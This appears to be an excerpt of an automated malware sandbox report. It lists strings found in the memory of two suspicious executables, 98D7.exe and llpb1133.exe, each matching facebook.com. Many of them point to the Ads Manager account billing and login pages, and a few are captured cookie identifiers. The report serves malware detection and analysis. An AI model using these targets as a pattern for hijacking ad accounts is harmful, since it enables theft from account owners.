&quot;https:\/\/pt-pt.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 3); return false;" title="Portuguese (Portugal)">Portugu equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: andwww.facebook.comll equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/#other_companies_section\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">other companies\u003C\/a> for advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_8_JS\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">More information\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_StXu140q-14 sx_6e887b\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp>\u003Cdiv class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Meta Products, and measure their performance\u003C\/li>\u003Cli class=\"_9xq0\">Features on our products will not be affected\u003C\/li>\u003Cli class=\"_9xq0\">Oth equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: e</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;ar_AR&quot;, &quot;en_US&quot;, &quot;https:\/\/ar-ar.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 7); return false;" title="Arabic"> equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eIwww.facebook.comHTEP equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: eive from cookies on and off Facebook\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_StXu140q-14 sx_9a85b3\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Meta Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use cookies.\u003C\/div>\u003Cdiv class=\"_9xo3\">You can allow the use of all cookies, just essential cookies or you can choose more options below. You can learn more about cookies and how we use them, and review or change your choice at any time in our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Meta Products. They\u2019re necessary for these sites to work as intended.\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Optional cookies\u003C\/p>\u003Cp>\u003C\/p>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xp-\">Cookies from other companies\u003C\/div>\u003Cdiv class=\"_9o-i\">We use tools from \u003Ca href=\ equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/ac equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing"wg equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing0 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingPv equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000003.522653816.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingalue132sames equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billinge equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingm equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingndex_meta_1 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billingr equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billings equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/ackY5HfXu3h@v equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000003.520897937.00000000004BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/aco","coho equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing1 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingF equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingbook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billinging equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingm) equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.477974039.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billings equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.482623800.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com:443 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com:443/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing0 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ihttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.00000000028BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;x-fb-rlafr0Persistent-AuthWWW-AuthenticateVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3Phttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-Type0Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerno-cachePragmaKeep-AliveTue, 07 Feb 2023 18:46:36 GMTDateProxy-ConnectioncloseConnectionprivate, no-cache, no-store, must-revalidateCache-ControlPG7 equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;tr_TR&quot;, &quot;en_US&quot;, &quot;https:\/\/tr-tr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">T equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: onloadRegister_DEPRECATED(function (){begin_polling_login_cookies("https:\/\/www.facebook.com\/ads\/manager\/account_settings\/account_billing");});</script> equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rXVad9Rwww.facebook.comaAc2sNw2CQ/tDh equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485706369.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: report-to: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485181523.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;https:\/\/sq-al.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 4); return false;" title="Albanian">Shqip</a></li><li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;es_LA&quot;, &quot;en_US&quot;, &quot;https:\/\/es-la.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espa equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.602257740.00000000004CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sFullUpdate:true,needsPartialUpdate:false,shouldLogResourcePerf:false},3977],["WebStorageMonsterLoggingURI",[],{uri:"/ajax/webstorage/process_keys/?state=1"},3032],["BrowserPaymentHandlerConfig",[],{enabled:false},3904],["TimeSpentConfig",[],{delay:1000,timeout:64,"0_delay":0,"0_timeout":8},142],["cr:1634616",["UserActivityBlue"],{__rc:["UserActivityBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:844180",["TimeSpentImmediateActiveSecondsLoggerBlue"],{__rc:["TimeSpentImmediateActiveSecondsLoggerBlue","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa1oVQO0yWyvfaoFs9wSOeaQlUPyEbHP8fawDnddMqXKEgKpM_9koC5Pk5-P8qhie_uf5KCJjyNsPhcEXFNVNUCWnLk"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487234070021903"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","gZziYzzFf_vTKeue4tgHUC4S",63072000000,"/",true,false,true]],["DeferredCookie","addToQ equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.484805156.0000000000502000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.480306540.0000000000513000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.000000000289E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com/ equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com07"cohort":"1:swl:"," equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com3966fc5c1f009ecd22e4b74973b5675 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.00000000004E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000003.520897937.00000000004BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comN equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comP equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comQ equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comU equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comh8 equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comook.com/-y equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comppatey.com|vk equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.comvwq equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.602167234.0000000000522000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.facebook.com} equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000003.485706369.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.477974039.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
          Source: llpb1133.exe, 00000014.00000002.604730284.0000000002841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} equals www.facebook.com (Facebook)
          Source: 98D7.exe, 00000010.00000002.605295836.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: {"status":3,"accounts":"0"}JaU9pSlNSVWszYlhjaWZleUp6YVdRaU9qSTRPREF4T1N3aWRHbHRaU0k2TVRZM05UUT09ctingClientSingleton:{r:["Jg4hod5","3zhsDmU","Yv2Rq7N"],rds:{m:["ContextualConfig","BladeRunnerClient","DGWRequestStreamClient","MqttLongPollingRunner","BanzaiScuba_DEPRECATED"],r:["c6kpRKc","9Zir1u8","sqCOqNp","HN4gUih","foz7nw7","msMcd10","TjYa5zM","5p9Jgd9","Ajrp3n3","CUpDMe1"]},be:1},RequestStreamCommonRequestStreamCommonTypes:{r:["Jg4hod5"],be:1}}}},allResources:["c6kpRKc","sqCOqNp","GpQFBwL","TjYa5zM","foz7nw7","CUpDMe1","msMcd10","BnbajS7","HN4gUih","Da6rL6k"]});}));</script></body></html>ActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["NavigationMetrics","setPage",[],[{page:"/login.php",page_type:"normal",page_uri:"https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing",serverLID:"7197487281236720703"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]],["NavigationClickPointHandler"],["WebDevicePerfInfoLogging","doLog",[],[]],["WebStorageMonster","schedule",[],[]],["Artillery","disable",[],[]],["ScriptPathLogger","startLogging",[],[]],["TimeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","jJziY-D4SfNE_AIOga4wSI2k",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","jJziY-AS0VgVTvocQFmmqm_m",63072000000,"/",false,false,true]]]},hsrp:{hsdp:{clpData:{"1871697":{r:1,s:1},"1829319":{P equals www.facebook.com (Facebook)
